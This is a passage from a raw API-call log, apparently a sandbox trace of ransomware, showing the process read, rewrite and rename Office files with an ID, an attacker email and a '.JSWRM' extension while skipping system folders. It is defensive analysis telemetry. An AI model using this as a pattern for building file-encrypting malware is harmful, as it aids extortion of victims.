dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.539] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=77416) returned 1 [0122.539] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12e60) returned 0x24e1d8 [0122.540] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x12e60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x12e60, lpOverlapped=0x0) returned 1 [0122.547] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.547] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x12e60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x12e60, lpOverlapped=0x0) returned 1 [0122.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.548] CloseHandle (hObject=0x238) returned 1 [0122.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0122.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0122.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0122.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0122.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0122.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0122.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.548] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISWEB.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visweb.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISWEB.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visweb.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0122.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0122.549] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1755c61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1755c61, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xaf2ed8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x86460, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VVIEWRES.DLL", cAlternateFileName="")) returned 1 [0122.549] lstrcmpiW (lpString1="VVIEWRES.DLL", lpString2=".") returned 1 [0122.549] lstrcmpiW (lpString1="VVIEWRES.DLL", lpString2="..") returned 1 [0122.549] lstrcmpiW (lpString1="VVIEWRES.DLL", lpString2="...") returned 1 [0122.549] lstrcmpiW (lpString1="VVIEWRES.DLL", lpString2="windows") returned -1 [0122.550] lstrcmpiW (lpString1="VVIEWRES.DLL", lpString2="recovery") returned 1 [0122.550] lstrcmpiW (lpString1="VVIEWRES.DLL", lpString2="perflogs") returned 1 [0122.550] lstrcmpiW (lpString1="VVIEWRES.DLL", lpString2="documents and settings") returned 1 [0122.550] lstrcmpiW (lpString1="VVIEWRES.DLL", lpString2="$RECYCLE.BIN") returned 1 [0122.550] lstrcmpiW (lpString1="VVIEWRES.DLL", lpString2="system volume information") returned 1 [0122.550] lstrcmpiW (lpString1="VVIEWRES.DLL", lpString2="msocache") returned 1 [0122.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0122.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VVIEWRES.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VVIEWRES.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VVIEWRES.DLL", lpUsedDefaultChar=0x0) returned 12 [0122.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0122.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0122.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VVIEWRES.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VVIEWRES.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VVIEWRES.DLL", lpUsedDefaultChar=0x0) returned 12 [0122.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0122.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0122.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0122.550] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4855a5d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4855a5d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4855a5d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x794, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WDALLLNK.VRD", cAlternateFileName="")) returned 1 [0122.550] lstrcmpiW (lpString1="WDALLLNK.VRD", lpString2=".") returned 1 [0122.550] lstrcmpiW (lpString1="WDALLLNK.VRD", lpString2="..") returned 1 [0122.550] lstrcmpiW (lpString1="WDALLLNK.VRD", lpString2="...") returned 1 [0122.550] lstrcmpiW (lpString1="WDALLLNK.VRD", lpString2="windows") returned -1 [0122.550] lstrcmpiW (lpString1="WDALLLNK.VRD", lpString2="recovery") returned 1 [0122.550] lstrcmpiW (lpString1="WDALLLNK.VRD", lpString2="perflogs") returned 1 [0122.550] lstrcmpiW (lpString1="WDALLLNK.VRD", lpString2="documents and settings") returned 1 [0122.550] lstrcmpiW (lpString1="WDALLLNK.VRD", lpString2="$RECYCLE.BIN") returned 1 [0122.550] lstrcmpiW (lpString1="WDALLLNK.VRD", lpString2="system volume information") returned 1 [0122.550] lstrcmpiW (lpString1="WDALLLNK.VRD", lpString2="msocache") returned 1 [0122.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0122.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WDALLLNK.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WDALLLNK.VRD", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WDALLLNK.VRD", lpUsedDefaultChar=0x0) returned 12 [0122.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0122.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0122.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WDALLLNK.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WDALLLNK.VRD", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WDALLLNK.VRD", lpUsedDefaultChar=0x0) returned 12 [0122.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0122.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0122.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0122.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0122.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WDALLLNK.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wdalllnk.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.561] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1940) returned 1 [0122.561] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x790) returned 0x20c6c0 [0122.561] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x790, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x790, lpOverlapped=0x0) returned 1 [0122.562] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.562] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x790, lpOverlapped=0x0) returned 1 [0122.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0122.563] CloseHandle (hObject=0x238) returned 1 [0122.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0122.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0122.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0122.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0122.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0122.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0122.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.563] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WDALLLNK.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wdalllnk.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WDALLLNK.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wdalllnk.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0122.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0122.564] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4855a5d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4855a5d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4855a5d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x579, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WDCMPVRD.XML", cAlternateFileName="")) returned 1 [0122.564] lstrcmpiW (lpString1="WDCMPVRD.XML", lpString2=".") returned 1 [0122.564] lstrcmpiW (lpString1="WDCMPVRD.XML", lpString2="..") returned 1 [0122.564] lstrcmpiW (lpString1="WDCMPVRD.XML", lpString2="...") returned 1 [0122.564] lstrcmpiW (lpString1="WDCMPVRD.XML", lpString2="windows") returned -1 [0122.564] lstrcmpiW (lpString1="WDCMPVRD.XML", lpString2="recovery") returned 1 [0122.564] lstrcmpiW (lpString1="WDCMPVRD.XML", lpString2="perflogs") returned 1 [0122.564] lstrcmpiW (lpString1="WDCMPVRD.XML", lpString2="documents and settings") returned 1 [0122.564] lstrcmpiW (lpString1="WDCMPVRD.XML", lpString2="$RECYCLE.BIN") returned 1 [0122.564] lstrcmpiW (lpString1="WDCMPVRD.XML", lpString2="system volume information") returned 1 [0122.564] lstrcmpiW (lpString1="WDCMPVRD.XML", lpString2="msocache") returned 1 [0122.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WDCMPVRD.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WDCMPVRD.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WDCMPVRD.XML", lpUsedDefaultChar=0x0) returned 12 [0122.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0122.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WDCMPVRD.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WDCMPVRD.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WDCMPVRD.XML", lpUsedDefaultChar=0x0) returned 12 [0122.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0122.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0122.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0122.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0122.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WDCMPVRD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wdcmpvrd.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.565] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1401) returned 1 [0122.565] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x570) returned 0x2332c0 [0122.566] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x570, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x570, lpOverlapped=0x0) returned 1 [0122.567] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.567] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x570, lpOverlapped=0x0) returned 1 [0122.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0122.567] CloseHandle (hObject=0x238) returned 1 [0122.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0122.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0122.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0122.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0122.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0122.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0122.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.568] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WDCMPVRD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wdcmpvrd.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WDCMPVRD.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wdcmpvrd.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0122.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0122.572] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x487bc7b, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x487bc7b, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x487bc7b, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x722, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WDERRLNK.VRD", cAlternateFileName="")) returned 1 [0122.572] lstrcmpiW (lpString1="WDERRLNK.VRD", lpString2=".") returned 1 [0122.572] lstrcmpiW (lpString1="WDERRLNK.VRD", lpString2="..") returned 1 [0122.572] lstrcmpiW (lpString1="WDERRLNK.VRD", lpString2="...") returned 1 [0122.572] lstrcmpiW (lpString1="WDERRLNK.VRD", lpString2="windows") returned -1 [0122.572] lstrcmpiW (lpString1="WDERRLNK.VRD", lpString2="recovery") returned 1 [0122.572] lstrcmpiW (lpString1="WDERRLNK.VRD", lpString2="perflogs") returned 1 [0122.572] lstrcmpiW (lpString1="WDERRLNK.VRD", lpString2="documents and settings") returned 1 [0122.572] lstrcmpiW (lpString1="WDERRLNK.VRD", lpString2="$RECYCLE.BIN") returned 1 [0122.572] lstrcmpiW (lpString1="WDERRLNK.VRD", lpString2="system volume information") returned 1 [0122.572] lstrcmpiW (lpString1="WDERRLNK.VRD", lpString2="msocache") returned 1 [0122.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0122.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WDERRLNK.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WDERRLNK.VRD", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WDERRLNK.VRD", lpUsedDefaultChar=0x0) returned 12 [0122.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0122.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 